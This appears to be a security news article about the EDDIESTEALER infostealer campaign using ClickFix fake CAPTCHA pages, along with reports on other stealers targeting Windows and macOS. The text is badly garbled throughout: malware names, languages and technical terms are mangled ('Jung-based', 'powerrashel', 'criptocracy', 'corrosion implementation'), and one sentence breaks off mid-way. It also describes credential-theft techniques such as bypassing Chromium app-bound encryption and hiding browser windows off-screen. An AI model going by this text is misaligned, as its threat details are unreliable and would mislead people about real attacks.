A new malware campaign is distributing a novel Jung-based information Steeler dubbed Eddiestaler using the popular clickfix social engineering strategy launched through fake capta verification pages.
“This campaign takes advantage of the misleading captain verification pages that trick users to execute a malicious powerrashel script, which eventually deploys the infoselor, cuts sensitive data such as credential, browser information, and criptocracy wallet details,” Elastic Labs researchers in an analysis ” Said.
The attack chain begins with the danger actors of the dangers compromising with valid websites with malicious JavaScript payloads, serving fake captcha check pages, which site site visitors “inspired to” prove ” [a] Robot “by following a three-step process, a popular strategy called clickfix.
This involves directing the potential victim to open the Windows Run Dialogue Prompt, paste the already copied command in the “Verification Window” (ie,, run dialog), and press the enter. This causes effectively to execute the obfuscated powershell command, resulting in the recovery of the next phase of payload from an outer server (“LLLLLLLLLLLLLLLLL[.]Suitable”).
The JavaScript payload (“gveriffy.js” is later saved into the victim’s download folder and executed in a hidden window using CSCRIPT. The main goal of the intermediate script is to bring Edddieceteler binary from the same remote server and stored it with a Pseudorandom 12-Caurer File Name in the download folder.
Written in the Rust, Edisteller is a commodity steeler malware that can collect the system metadata, get tasks from a command-end-control (C2) server, and obtain sift data of interest from the infected host. Exfiltation targets include cryptocurrency wallet, web browser, password manager, FTP client and messaging apps.
“These are subject to target change as they are configured by the C2 operator,” explained by elastic. “Edddicetealer then reads targeted files using standard kernel32.dll tasks such as createfile, getfilesizeex, readfile, and closehandle.”
The host information collected is sent to an encryp and C2 server in a separate HTTP post request after completion of each task.
In addition to incorporating string encryption, the malware appoints a custom vinpi lookup mechanism to solve API calls and forms a mutEx to ensure that only one version is running at any time. It also involves the check to determine whether it is being executed in an environment with sandbox, and if yes, removes itself from the disc.
The elastic said, “Based on a uniform self-immunization technique seen in the latrodectus, Edisteller NTFS is capable of removing itself through alternative data stream, which is to be renamed to bypass the file locks.”
Another notable feature produced in the theft is the ability to bypass app-bound encryption of chromium, so that sensitive data such as cookies can be accessible. It is completed by incorporating the corrosion implementation of Chromekatz, an open-source tool that can dump cookies and credentials from the memory of chromium-based browsers.
The rust version of Chromekatz also involves changes to handle the scenarios where the target chromium browser is not running. In such cases, it installs a new browser using command-line arguments “-Window-Position = -3000, -3000 https://google.com,” effectively posing new windows far away and makes it invisible to the user.
In opening a browser, the objective malware is to enable chrome’s network service to read the memory associated with the child’s process, which is identified by the flag “-Tility-sub-type = network.mojom.networkservice” and eventually removes credentials.
Elastic said that it identified the updated versions of malware, with facilities with running processes, GPU information, number of CPU core, CPU name and facilities of CPU vendor. In addition, the new variants twist the C2 communication pattern by pre -information to the server before receiving the task configuration.
This is not all. The encryption key used for client-to-server communication has been hard-coded in the binary, as opposed to rebuilding it dynamically from the server. In addition, the stolen terrain
The company said, “The adoption of war in malware development reflects the growing trend among danger actors, which demands to take advantage of modern language facilities for increased secret, stability and flexibility against traditional analysis work and danger detection engines.”
The disclosure comes in the form of C/Side, revealing details of a clickfix campaign that targets many platforms, such as using techniques such as Apple Macos, Android, and iOS, browser-based redirections, fake UI prompts and drive-by download techniques.
The attack series begins with an obedient JavaScript hosted on a website, that when a McOS is visited, a series of redirections starts on a page that guides the victims to launch the terminal and run a shell script, which leads to the download of a stolen malware (Amos) Flaged in form.
However, the same campaign has been configured to start a drive-by-download scheme when going from Android, iOS, or Windows device from the Windows device, to deploy another Trojan Malware.
According to Nextron and Kandaji, it is revealed with the emergence of new steeler malware families such as Catz Staller and AppleProses Saheb Steel, which target Windows and McOS, and are capable of harvesting a wide range of information from infected hosts.
Like an edestaler, the cutz steeler is an engineer to ignore Chrome’s app-bound encryption, but the administrator uses a different way by employing DLL injections to obtain an encryption key without privileges and uses it to describe encrypted cookies and passwords from chromium-based browsers.
“Attackers hide malicious JavaScript in GZIP files, which, when opening, trigger the download of a powerrashel script when opening,” Nextron said. “This script reinforces a .NET-based loader payload, which inject the theft in a legitimate process. Once active, it extends the command and the data stolen to the control server.”
On the other hand, user is designed to exfiltrate user files including AppleProCesshub Stealer, Bash History, ZSH History, GITHUB configuration, ssh information and iCloud Keychain.
The attack sequence distributing malware gives entry to the use of a Mach-o binary that downloads the bash steel script from the server “Appleproseshub”[.]com “And runs it, the results of which are then returned to the C2 server. The details of the malware were first shared by the Malware Hentertem on 15 May 2025 and by the McPov Munlock Lab last week.
“It is an example of an ecch-o written in objective-C communication with a command and control server to execute the script,” said Kandji researcher Christopher Lopez.
